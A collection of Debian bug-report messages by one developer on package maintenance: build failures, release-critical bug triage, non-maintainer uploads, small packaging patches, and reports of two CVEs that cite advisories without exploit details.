Bug#1066313: fixed upstream

[micah anderson]

These issues are fixed upstream in main, but there is not a release.

The fix is in commit 1171bf2fd4e7a0cab02cf5fca59090b65af9cd29.

Clément would you pull that fix into the package to resolve this FTBFS?

Bug#938737: u1db: Python2 removal in sid/bullseye

[micah anderson]

Moritz Mühlenhoff  writes:

> On Fri, Aug 30, 2019 at 07:57:06AM +, Matthias Klose wrote:
>> Package: src:u1db
>> Version: 13.10-6.4
>> Severity: normal
>> Tags: sid bullseye
>> User: debian-pyt...@lists.debian.org
>> Usertags: py2removal
>> 
>> Python2 becomes end-of-live upstream, and Debian aims to remove
>> Python2 from the distribution, as discussed in
>> https://lists.debian.org/debian-python/2019/07/msg00080.html
>> 
>> Your package either build-depends, depends on Python2, or uses Python2
>> in the autopkg tests.  Please stop using Python2, and fix this issue
>> by one of the following actions.
>
> Hi Micah,
> per Wikipedia the Ubuntu One cloud storage has been shut down many years
> ago, should this simply be removed?

We were not using it for Ubuntu One cloud storage, but instead as its
more generic use case as "a cross-platform, cross-device, syncable
database API", which we modified to have client-side encrypted database
replicas and documents.

However, it is not being used any longer, and should simply be removed.

-- 
micah

Bug#895381: Severity

[micah anderson]

Hello Sergio,

I'm reviewing bugs that are currently release critical at our local bug
squashing party, and I stumbled on yours.

I'm not disputing this bug exists, I'm just trying to determine why it
is you set the severity to "Serious". As you are probably aware, this
severity indicates that this is a sever violation of Debian policy
(violates a "must" or "required" directive), or in the package
maintainer's opinion, makes the package unsuitable for release.

Can you specify what part of debian policy this issue makes this bug
severity "Serious"?

Thanks!

-- 
micah

Bug#892340: Status of upload?

[micah anderson]

Hello Marc,

I'm checking up on RC bugs, because we are working on a Bug Squashing
Party here.

Back in November, you were saying you were going to combine this fix
with a bump of upstream's version:

> I was planning to combine this with an update from upstream.

I'm wondering if you are planning on doing this soon? If you aren't,
maybe we could upload the package with the fix?

-- 
micah

Bug#859927: Works, uploaded to DELAYED-3

[micah anderson]

That fix works, I've done a NMU fixed package and uploaded it to
DELAYED-3.

Micah

Bug#859927: Confirmed

[micah anderson]

I've confirmed this bug, as reported:

I installed lighttpd:

The following NEW packages will be installed:
  lighttpd spawn-fcgi
0 upgraded, 2 newly installed, 0 to remove and 326 not upgraded.
Need to get 299 kB of archives.
After this operation, 1,019 kB of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://httpredir.debian.org/debian sid/main amd64 lighttpd amd64 1.4.45-1 
[284 kB]
Get:2 http://httpredir.debian.org/debian sid/main amd64 spawn-fcgi amd64 
1.6.4-1+b1 [14.9 kB]
Fetched 299 kB in 1s (194 kB/s)  
Selecting previously unselected package lighttpd.
(Reading database ... 206019 files and directories currently installed.)
Preparing to unpack .../lighttpd_1.4.45-1_amd64.deb ...
Unpacking lighttpd (1.4.45-1) ...
Selecting previously unselected package spawn-fcgi.
Preparing to unpack .../spawn-fcgi_1.6.4-1+b1_amd64.deb ...
Unpacking spawn-fcgi (1.6.4-1+b1) ...
Setting up spawn-fcgi (1.6.4-1+b1) ...
Setting up lighttpd (1.4.45-1) ...
Created symlink /etc/systemd/system/multi-user.target.wants/lighttpd.service → 
/lib/systemd/system/lighttpd.service.
Processing triggers for systemd (232-20) ...
Processing triggers for man-db (2.7.6.1-2) ...

and confirmed it is running:

root@reeds:/home/micah/debian/lighttpd-1.4.45# ps auxw |grep lighttpd
www-data  2129  0.0  0.0  58924  5452 ?Ss   15:03   0:00 
/usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
root  4119  0.0  0.0  12788   956 pts/3S+   15:03   0:00 grep lighttpd

I enabled the module as described in the bug:

root@reeds:/home/micah/debian/lighttpd-1.4.45# lighttpd-enable-mod fastcgi-php
Met dependency: fastcgi
Enabling fastcgi-php: ok
Enabling fastcgi: ok
Run "service lighttpd force-reload" to enable changes
root@reeds:/home/micah/debian/lighttpd-1.4.45# service lighttpd force-reload

and now lighttpd is not running:

root@reeds:/home/micah/debian/lighttpd-1.4.45# ps auxw |grep lighttpd
root  4223  0.0  0.0  12788   980 pts/3S+   15:04   0:00 grep lighttpd

I will attempt to apply the patch and see if it works.

micah

Bug#817521: libapache-mod-removeip: Removal of debhelper compat 4

[micah anderson]

Hello,

intrigeri  writes:

> Hi Micah,
>
> Adrian Bunk:
>> Can you anyway NMU this package?
>
>> The alternative is that it will get removed from stretch soon.
>
> Well, it's not a goal of mine to include as many packages in Stretch
> as possible. So I really don't want to be the one who decides that
> a given package will be part of a Debian stable release, if its
> maintainers are not ready to support it there; in this case, I see
> little indication that they are. (And backports are always an option
> anyway :)
>
> Micah, what do you think? If you're ready to support the package in
> Stretch, I'm happy to give some one-shot help by NMU'ing it over the
> week-end.

It would be great if the package could continue to be in
Stretch.

Unfortunately, I have not been able to address this issue, and would be
very happy if you could NMU the work you did to fix this issue!

micah


signature.asc
Description: PGP signature

Bug#848766: reel: FTBFS: ERROR: Test "ruby2.3" failed: Failure/Error: response = http.request(request)

[micah anderson]

Antonio Terceiro  writes:

>> Relevant part (hopefully):
>> >  Failure/Error: response = http.request(request)
>> > 
>> >  OpenSSL::SSL::SSLError:
>> >SSL_connect returned=1 errno=0 state=unknown state: sslv3 alert 
>> > unsupported certificate

Hmm, I built the reverse depends on ruby-certificate-authority and found
this failure in reel, and patched it in 0.6.1-3 to fix this error. I'm
surprised its back, that means something didn't go right with my patch.
I'll have a look at it.

> Micah, was there a specific reason to package an unreleased snapshot of
> ruby-certificate-authority? The changelog doesn't really say anything.

The last official upstream tagged release and gem publish was august
2012. The upstream author bumped the version to 2.0 in Sept. 2012, and
there have been a number of important fixes (including security) since
then. There is also a request in the github issue tracker for a new
release in May 2014, no response.

I spoke with the original packager (Sebastien Badia) about updating this
to the current master which fixes those issues, and he gave the go ahead
if we resolved all the reverse-deps.

micah

Bug#761114: network-manager: erroneously removes externally provided routes

[Micah Anderson]

Package: network-manager
Version: 0.9.10.0-2
Severity: serious
Tags: patch
Justification: breaks unrelated software

Hello,

When using unrelated software, such as openvpn, that pushes default routes,
network-manager immediately (and incorrectly) removes that route. This is new
behavior in 0.9.10, it does not do this in previous versions.

I spent quite a bit of time debugging this issue with upstream NM people
on their IRC channel, in the end they came up with a patch that was
committed upstream in git with the following hash:
06703c1670d0f96834b268920b09792e22fdb4c4)

I tested this change, and it worked well for me, previously I uploaded a NMU,
with this patch, thinking that this was #755015, and it successfully fixed the
problem for me and others I know who are experiencing this issue. However, the
NMU was not acknowledged in -2, due to it being targeted for the incorrect bug
number.

Considering that this effectively breaks all OpenVPN setups (and other software
that modifies default routes) that are not using network-manager's built-in VPN
mechanisms, this seems to me a serious regression over previous versions. Seeing
as upstream has acknowledged this issue and provided a fix for it and that fix
has been tested and even migrated to testing, it seems to me appropriate to
cherry-pick the change in the package without waiting for the next major release
of NM. 

I'm happy to re-NMU this fix, this time with the right bug number. Attached is
the NMU diff (I'd only add the bug number to the changelog).

micah


-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages network-manager depends on:
ii  adduser3.113+nmu3
ii  dbus   1.8.6-2
ii  init-system-helpers1.21
ii  isc-dhcp-client4.3.1-1
ii  libc6  2.19-10
ii  libdbus-1-31.8.6-2
ii  libdbus-glib-1-2   0.102-1
ii  libgcrypt111.5.4-3
ii  libglib2.0-0   2.40.0-5
ii  libgnutls-deb0-28  3.3.7-2
ii  libgudev-1.0-0 208-8
ii  libmm-glib01.2.0-1
ii  libndp01.4-1
ii  libnewt0.520.52.17-1
ii  libnl-3-2003.2.24-2
ii  libnl-genl-3-200   3.2.24-2
ii  libnl-route-3-200  3.2.24-2
ii  libnm-glib40.9.10.0-2
ii  libnm-util20.9.10.0-2
ii  libpam-systemd 208-8
ii  libpolkit-gobject-1-0  0.105-6.1
ii  libreadline6   6.3-8
ii  libsoup2.4-1   2.46.0-2
ii  libsystemd-daemon0 208-8
ii  libsystemd-login0  208-8
ii  libteamdctl0   1.12-1
ii  libuuid1   2.20.1-5.8
ii  lsb-base   4.1+Debian13
ii  policykit-10.105-6.1
ii  udev   208-8
ii  wpasupplicant  1.1-1

Versions of packages network-manager recommends:
ii  crda  3.13-1
ii  dnsmasq-base  2.71-1
ii  iptables  1.4.21-2
ii  modemmanager  1.2.0-1
ii  ppp   2.4.6-2

Versions of packages network-manager suggests:
ii  avahi-autoipd  0.6.31-4
pn  libteam-utils  none

-- Configuration Files:
/etc/NetworkManager/NetworkManager.conf changed:
[main]
plugins=ifupdown,keyfile
[ifupdown]
managed=false
[logging]


-- no debconf information
diff -Nru network-manager-0.9.10.0/debian/changelog network-manager-0.9.10.0/debian/changelog
--- network-manager-0.9.10.0/debian/changelog	2014-07-10 00:49:54.0 -0400
+++ network-manager-0.9.10.0/debian/changelog	2014-08-11 12:37:33.0 -0400
@@ -1,3 +1,11 @@
+network-manager (0.9.10.0-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pull patch from upstream to fix checks for default
+routes
+
+ -- Micah Anderson mi...@debian.org  Mon, 11 Aug 2014 12:08:31 -0400
+
 network-manager (0.9.10.0-2) unstable; urgency=medium
 
   * New upstream release.
diff -Nru network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes
--- network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes	1969-12-31 19:00:00.0 -0500
+++ network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes	2014-08-11 12:37:08.0 -0400
@@ -0,0 +1,83 @@
+Index: network-manager-0.9.10.0/src/nm-ip4-config.c
+===
+--- network-manager-0.9.10.0.orig/src/nm-ip4-config.c	2014-07-03 20:44:19.0 -0400
 network-manager-0.9.10.0/src/nm-ip4-config.c	2014-07-29 19:42:06.965378158 -0400
+@@ -198,7 +198,7 @@
+ 	for (i = 0; i  priv-routes-len; i++) {
+ 		const NMPlatformIP4Route *route = g_array_index (priv-routes, NMPlatformIP4Route, i);
+ 
+-		if (route-network == 0) {
++		if (NM_PLATFORM_IP_ROUTE_IS_DEFAULT (route)) {
+ 			if (route-metric

Bug#758318: FTBFS: missing build-depends: sp

[Micah Anderson]

Package: bird
Version: 1.4.4-1
Severity: serious
Tags: patch
Justification: Fails to build from source

Hello,

The bird package currently fails to build from source because during the pdf
generation phase it cannot find /usr/bin/nsgmls. Simply adding the 'sp' package
to the build-depends makes it work again. The attached patch shows this. I'm
happy to upload this as a NMU if it would help you.

make[2]: Entering directory '/home/micah/debian/bird-1.4.4/doc'
/home/micah/debian/bird-1.4.4/tools/progdoc /home/micah/debian/bird-1.4.4
/Doc
/doc/Doc
prog-intro.sgml
/nest/Doc
rt-fib.c
rt-table.c
Warning(551): Function parameter 'before_old' not described in 'rte_announce'
Warning(1446): Function parameter 'tab' not described in 'rt_prune_table'
rt-attr.c
proto.sgml
proto.c
Warning(731): Function parameter 'UNUSED' not described in 
'graceful_restart_done'
proto-hooks.c
Warning(161): Function parameter 'buflen' not described in 'get_attr'
iface.c
neighbor.c
Warning(352): Function parameter 'a' not described in 'neigh_ifa_update'
cli.c
locks.c
/conf/Doc
conf.c
cf-lex.l
Warning(561): Function parameter 'c' not described in 'cf_lex_init'
/filter/Doc
filter.c
tree.c
trie.c
Warning(84): Function parameter 'lp' not described in 'f_new_trie'
/proto/Doc
/proto/bfd/Doc
bfd.c
/proto/bgp/Doc
bgp.c
Warning(729): Function parameter 'UNUSED' not described in 
'bgp_incoming_connection'
packets.c
attrs.c
/proto/ospf/Doc
ospf.c
topology.c
Warning(1610): Function parameter 'pool' not described in 'ospf_top_new'
neighbor.c
iface.c
packet.c
lsalib.c
dbdes.c
rt.c
/proto/pipe/Doc
pipe.c
/proto/rip/Doc
rip.c
auth.c
/proto/radv/Doc
radv.c
packets.c
/proto/static/Doc
static.c
../nest/rt-dev.c
/sysdep/Doc
sysdep.sgml
/sysdep/unix/Doc
log.c
Warning(106): Function parameter 'buf' not described in 'log_commit'
krt.c
/lib/Doc
ip.c ipv4.c ipv6.c
lists.c
checksum.c bitops.c patmatch.c printf.c xmalloc.c
resource.sgml
resource.c
mempool.c
slab.c
event.c
../sysdep/unix/io.c
Warning(454): Function parameter 'fmt_spec' not described in 
'tm_format_datetime'
./sgml2html prog.sgml
Processing file prog.sgml
sh: 1: /usr/bin/nsgmls: not found
./sgml2latex --output=tex prog.sgml
Processing file prog.sgml
sh: 1: /usr/bin/nsgmls: not found
pdflatex prog.tex
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2014/Debian) 
(preloaded format=pdflatex)
 restricted \write18 enabled.
entering extended mode
! I can't find file `prog.tex'.
* prog.tex

(Press Enter to retry, or Control-D to exit)
Please type another input file name: 

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages bird depends on:
ii  adduser   3.113+nmu3
ii  libc6 2.19-7
ii  libreadline6  6.3-8
ii  libtinfo5 5.9+20140712-2

bird recommends no packages.

Versions of packages bird suggests:
ii  bird-doc  1.4.4-1
diff --git a/debian/changelog b/debian/changelog
index f8b69d0..0f662e4 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+bird (1.4.4-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Add sp package to Build-depends to provide missing /usr/bin/nsgmls
+fixing FTBFS 
+
+ -- Micah Anderson mi...@debian.org  Sat, 16 Aug 2014 15:45:29 -0400
+
 bird (1.4.4-1) unstable; urgency=medium
 
   * New upstream version 1.4.4
diff --git a/debian/control b/debian/control
index 5d10ec6..27c3bd8 100644
--- a/debian/control
+++ b/debian/control
@@ -12,7 +12,7 @@ Build-Depends: quilt,
 	   autotools-dev,
 	   xsltproc,
 	   docbook-xsl,
-	   linuxdoc-tools-latex
+	   linuxdoc-tools-latex, sp
 Maintainer: Ondřej Surý ond...@debian.org
 Standards-Version: 3.9.5
 Vcs-Browser: http://git.debian.org/?p=users/ondrej/bird.git

Bug#737149: CVE-2014-1691: Remote code execution in horde 5.1.1

[Micah Anderson]

Package: horde3
Version: 3.3.8+debian0-2
Severity: serious
Tags: security
Justification: security issue

Hello,

As detailed on the debian security tracker[0] and reported on oss-sec[1] and 
assigned CVE 2014-1691, there is a remote code execution bug in horde affecting 
all versions from at least horde 3.1.x to 5.1.1.

That includes squeeze... I've got a patch that applies to the horde3 package in 
squeeze that resolves this issue, please find it attached[2]... I've built and 
tested these packages on Squeeze in an active environment. I am not certain 
where this particular code is used, so I wasn't sure if I was able to test 
exactly that code path.

If you would like, I can provide a package for squeeze for a DSA.

Micah

0. https://security-tracker.debian.org/tracker/CVE-2014-1691
1. http://seclists.org/oss-sec/2014/q1/153
2. 
https://gist.github.com/pietro/8712454/raw/b03bc5ecb7ec1f1f778b867ecd6d9d142d0ddaf7/gistfile1.diff

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.12-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages horde3 depends on:
ii  apache2  2.4.7-1
ii  apache2-bin [httpd]  2.4.7-1
ii  libapache2-mod-php5  5.5.8+dfsg-3
ii  libjs-scriptaculous  1.9.0-2
ii  php-log  1.12.7-1
ii  php-mail 1.2.0-5
ii  php-mail-mime1.8.8-1
ii  php5-gd  5.5.8+dfsg-3
ii  php5-mcrypt  5.5.8+dfsg-3

Versions of packages horde3 recommends:
pn  fckeditor  none
ii  locales2.17-97
ii  logrotate  3.8.7-1
pn  php-date   none
ii  php-db 1.7.14-2
pn  php-file   none
ii  php-mdb2   2.5.0b5-1
pn  php-mdb2-driver-mysql | php-mdb2-driver-pgsql | php-mdb2-driv  none
pn  php-services-weather   none
ii  php5-cli   5.5.8+dfsg-3
pn  php5-mysql | php5-pgsql | php5-ldapnone
pn  tinymce2 | tinymce none

Versions of packages horde3 suggests:
pn  chora2none
pn  enscript  none
ii  gettext   0.18.3.2-1
pn  gollemnone
pn  imp4  none
pn  kronolith2none
ii  libgeoip1 1.6.0-1
pn  libwpd-tools  none
pn  mnemo2none
pn  php-net-imap  none
pn  php5-auth-pam none
ii  php5-common [php5-mhash]  5.5.8+dfsg-3
pn  ppthtml   none
pn  rpm   none
pn  source-highlight  none
pn  turba2none
pn  unrtf none
pn  webcppnone
pn  wvnone
pn  xlhtmlnone

-- Configuration Files:
/etc/horde/horde3/.htaccess [Errno 13] Permission denied: 
u'/etc/horde/horde3/.htaccess'
/etc/horde/horde3/conf.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/conf.php'
/etc/horde/horde3/conf.xml [Errno 13] Permission denied: 
u'/etc/horde/horde3/conf.xml'
/etc/horde/horde3/hooks.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/hooks.php'
/etc/horde/horde3/mime_drivers.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/mime_drivers.php'
/etc/horde/horde3/motd.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/motd.php'
/etc/horde/horde3/nls.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/nls.php'
/etc/horde/horde3/prefs.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/prefs.php'
/etc/horde/horde3/registry.d/README [Errno 13] Permission denied: 
u'/etc/horde/horde3/registry.d/README'
/etc/horde/horde3/registry.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/registry.php'

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#716909: Should be resolved

[Micah Anderson]

close 716909
thanks

I believe that I've resolved this, the following addresses are allowed
to send, if there is an additional ftp master email that needs to be
allowed, please let me know and I will add that:

d...@ftp-master.debian.org, debb...@bugs.debian.org,
debb...@busoni.debian.org, debian-bugs-d...@lists.debian.org,
f...@debian.org, instal...@ftp-master.debian.org,
nore...@release.debian.org, ow...@bugs.debian.org,
ow...@busoni.debian.org, ow...@packages.qa.debian.org,
p...@qa.debian.org,pabs q...@master.debian.org

micah


pgpGwp9mxXYPM.pgp
Description: PGP signature

Bug#710163: CVE-2013-1629: Man in the middle possibility

[Micah Anderson]

Package: python-pip
Version: 1.1-3
Severity: serious
Tags: security
Justification: security

Hello,

It appears as if python-pip in Debian (all versions supported) suffers
from CVE-2013-1629. This CVE appears to still be reserved, but is
clearly described in a few places on the internet[0],[1].

A new version uploaded to sid would solve this problem there, but to
backport these issues to wheezy and squeeze may be a bit difficult.

Thanks,
micah


0. 
http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a/
1. https://github.com/TheTorProject/ooni-backend/pull/1#discussion_r4084881

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.8-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages python-pip depends on:
ii  python2.7.3-5
ii  python-pkg-resources  0.6.37-1
ii  python-setuptools 0.6.37-1
ii  python2.6 2.6.8-2

Versions of packages python-pip recommends:
ii  build-essential  11.6
pn  python-dev-all   none

python-pip suggests no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#710164: CVE-2013-1629: Man in the middle possibility

[Micah Anderson]

Package: python-virtualenv
Version: 1.7.1.2-2
Severity: serious
Tags: security
Justification: security

Hello,

It seems as if python-virtualenv embeds a copy of pip[0], and there is
a security issue with python-pip noted as CVE-2013-1629 which affects
squeeze and wheezy (it appears fixed in sid and jessie). This issue
currently is marked as 'reserved' by Mitre, but it is clearly defined
on the internet[1],[2].

Please coordinate with the debian security team to update this package
as soon as possible to resolve this issue. Please reference this CVE
and bug number in any changelog dealing with this problem.

Micah


0. This is in violation of debian policy '4.13 Convenience copies of
code' and should be fixed to depend on the version of python-pip in
the archive.

1.http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a/
2. https://github.com/TheTorProject/ooni-backend/pull/1#discussion_r4084881

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.8-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#698294: [Pkg-puppet-devel] Bug#698294: Bug#698294: diff for NMU 2.7.18-2.1

[micah anderson]

Russ Allbery r...@debian.org writes:

 Anton Gladky gl...@debian.org writes:

 Ok, I canceled the upload.

 We cannot postpone Wheezy-release, waiting for every upstream's
 decision. If the solution works, why should not it be applied?
 Otherwise the package should be removed from testing.

The solution may work, but if upstream deems the code insufficient it
might be because of some very important reasons. For example, it might
make this specific situation work, but breaks other things, or only
works for one case, but not another, or many other possible reasons. 

For this issue, what caused this upstream was a fix for another issue,
and I am not sure that the proposed fix will cause the original issue to
re-appear, I dont want a regression for that issue to come up as a
result.

I don't think it is such a great idea to stuff something into the Debian
package that upstream has a problem with, it tends to make upstream
unhappy when they have to deal with the fact that it exists in the
Debian package for years. In particular I'm thinking of how great they
have been when security issues have come up and they've produced
backports of fixes for the versions that we carry. If their backports
aren't going to work because we decided to put in some code that they
didn't like in the first place, how do we deal with the security fix
then?

 The problem is mildly obscure (many Puppet manifests, including very
 complex and non-trivial ones, will never trigger this error condition) and
 absolutely does not warrant removing the package from testing.  In fact,
 I'm tempted to downgrade it to important again, although if there is a
 tested upstream fix, I'd be in favor of applying it for wheezy.

I have to agree with Russ, this is a kind of weird corner case.

micah


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#698294: [Pkg-puppet-devel] Bug#698294: diff for NMU 2.7.18-2.1

[micah anderson]

Anton Gladky gl...@debian.org writes:

 Hi,

 I have rescheduled an upload for 15-days. Or you want me to cancel it
 completely?

 Anton

 On 03/01/2013 12:45 PM, Stig Sandbeck Mathisen wrote:
 
 That patch was marked as Code Insufficient in the upstream bug tracker
 two weeks ago at http://projects.puppetlabs.com/issues/7680#note-18
 
 Please delay it until this is resolved by upstream.

As far as I know, there is no 'DELAYED/until this is resolved by
upstream' queue :)

Uploading something that upstream has deemed insufficient code, even to
DELAYED-15 doesn't seem like the right thing to do, especially since
this places an arbitrary deadling on upstream.

I think it best to cancel this upload until we have a clear fix from
upstream.

I understand that this issue impacts you and you would like a
resolution, but I think that the right thing to do here is to speed up
that resolution with upstream. Figure out what it is that is
insufficient in the code and get that resolved. 

Once upstream is happy with the code, then we can look at what needs to
be done to get this into Debian.



pgpgaFlnG1M2t.pgp
Description: PGP signature

Bug#700350: dovecot-core: fails to upgrade from squeeze to bpo: Can't locate feature.pm in @INC

[micah anderson]

Marco Nenciarini mnen...@kcore.it writes:

 Il giorno 12/feb/2013, alle ore 17:16, Jaldhar H. Vyas ha scritto:
 
 
 Thanks for the patch but if the diagnosis is correct it seems it will not be 
 needed as -7 took out the perl code.  So backporting that should solve the 
 problem.  Unfortunately I am rather pressed for time right now and the other 
 dovecot maintainers even more so.  Micah can you take care of this?
 


 I can take care of backporting if it's ok for you all.

please go ahead, I'm quite busy until next week myself.

micah


pgpsI8C4nF_VL.pgp
Description: PGP signature

Bug#681549: Still present in 1.2.0-3

[micah anderson]

Dane Elwell dane.elw...@ukfast.co.uk writes:

 This bug seems to still exist in CouchDB 1.2.0-3 update that was pushed out 
 recently in Wheezy.


 Setting up couchdb (1.2.0-3) ...
 Installing new version of config file /etc/init.d/couchdb ...
 Installing new version of config file /etc/logrotate.d/couchdb ...
 [] Starting database server: couchdbApache CouchDB needs write permission 
 on the PID file: /var/run/couchdb/couchdb.pid
  failed!
 invoke-rc.d: initscript couchdb, action start failed.
 dpkg: error processing couchdb (--configure):
  subprocess installed post-installation script returned error exit status 1
 Errors were encountered while processing:
  couchdb
 E: Sub-process /usr/bin/dpkg returned an error code (1)


I think this happens when you upgrade from 1.2.0-2, where the bad
ownership was, to 1.2.0-3 where it is fixed. If you install 1.2.0-3
directly, without ever having 1.2.0-2 installed, you no longer have the
problem.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#681549: Unsuitable for release

[micah anderson]

severity 681549 serious
thanks

I'm marking this bug as serious (accidentally made it grave a minute
ago), bucause I believe that it makes the package unsuitable for
release, and the fix is trivial, so it should be able to be brought into
wheezy without issue.

The this issue renders the package uninstallable:

Starting database server: couchdbApache CouchDB needs write permission on the 
PID file: /var/run/couchdb/couchdb.pid
failed!
invoke-rc.d: initscript couchdb, action start failed.
dpkg: error processing couchdb (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing: couchdb
E: Sub-process /usr/bin/dpkg returned an error code (1)


-- 


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#680235: debirf: wheezy minimal image segfaults during boot

[Micah Anderson]

Hi Lucas,

* Lucas Nussbaum lu...@lucas-nussbaum.net [2012-09-30 03:43-0400]:
 On 08/09/12 at 23:03 -0400, Daniel Kahn Gillmor wrote:
  Control: tags 680235 + unreproducible moreinfo
  
  Hi Lucas--
  
  On 07/04/2012 10:40 AM, Lucas Nussbaum wrote:
   I generate a wheezy 'minimal' image using debirf (running it as root,
   since running it as normal user fails).
   
   After generation, I try to boot it using:
   kvm -m 512 -kernel vmlinuz-3.2.0-2-amd64 -initrd 
   debirf-minimal_wheezy_3.2.0-2-amd64.cgz
   
   During boot, I get:
   [0.419335] rtc_cmos 00:01: RTC can wake from S4
   [0.419735] rtc_cmos 00:01: rtc core: registered rtc_cmos as rtc0
   [0.420093] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
   [0.420392] cpuidle: using governor ladder
   [0.420629] cpuidle: using governor menu
   [0.420987] TCP cubic registered
   [0.421230] NET: Registered protocol family 10
   [0.423396] Mobile IPv6
   [0.423606] NET: Registered protocol family 17
   [0.423868] Registering the dns_resolver key type
   [0.424263] registered taskstats version 1
   [0.424643] rtc_cmos 00:01: setting system clock to 2012-07-04 
   14:30:03 UTC (
   1341412203)
   [0.425109] Initializing network drop monitor service
   [0.426024] Freeing unused kernel memory: 572k freed
   [0.426406] Write protecting the kernel read-only data: 6144k
   [0.428208] Freeing unused kernel memory: 672k freed
   [0.430214] Freeing unused kernel memory: 684k freed
   [0.432194] init[31]: segfault at 57d71c ip 0044104d sp 
   7fff83ab1
   7f0 error 7 in sh[40+1b3000]
   Segmentation fault
   unpacking rootfs...
   [1.340047] Refined TSC clocksource calibration: 2793.734 MHz.
  
  i've been unable to reproduce this with existing versions, including
  0.33 (just uploaded to unstable).  Are you able to see this on other
  hardware?  do you still have the image you created available?  i'd be
  happy to take a look at it and try to dissect what's happening.
 
 Hi,
 
 I confirm that I can still reproduce this in wheezy using debirf 0.32.
 
 Using debirf 0.33 (only package that was updated when testing; same
 machine), it works fine both using the minimal.tgz example from debirf
 0.32, and the one from debirf 0.33.
 
 I've uploaded the broken image to
 http://blop.info/pub/vmlinuz-3.2.0-3-amd64
 http://blop.info/pub/debirf-minimal_wheezy_3.2.0-3-amd64.cgz
 
 To reproduce, boot with
 kvm -m 512 -kernel vmlinuz-3.2.0-3-amd64 -initrd 
 debirf-minimal_wheezy_3.2.0-3-amd64.cgz

I just downloaded your two files and did the kvm command that you provided and I
did not get the segfault, rather it booted up to this:

/proc/cmdline: No such file or directory

Debian GNU/Linux wheezy/sid (none) tty1

(none) login:

but otherwise, I do not get the segfault that you experience. The only
difference here is that I was running in Squeeze. Unfortunately, I could not
find a wheezy box with amd64 and kvm extensions. I'll ask around to see what I
can find.

micah



signature.asc
Description: Digital signature

Bug#678072: [Pkg-puppet-devel] Bug#678072: puppet-lint: fails to run

[micah anderson]

Holger Levsen hol...@layer-acht.org writes:

 severity 678072 serious
 thanks

 On Dienstag, 19. Juni 2012, John Eikenberry wrote:
 Running puppet-lint fails every time, with or without any arguments.  This
 coincided with a recent change of ruby to default to 1.9.1 instead of 1.8.
 The puppet-common package, which puppet-lint depends on, doesn't include
 support for 1.9.1.

 as ruby will default to 1.9 in wheezy this will make the package completly 
 unusable, thus raising the severity.


According to: https://github.com/rodjek/puppet-lint/issues/103 - this
should work with 1.9.2, this patch doesn't appear in the debian package,
and looks pretty trivial. The reported issue seems to be pretty
different from what was reported in the upstream github though.

micah



-- 
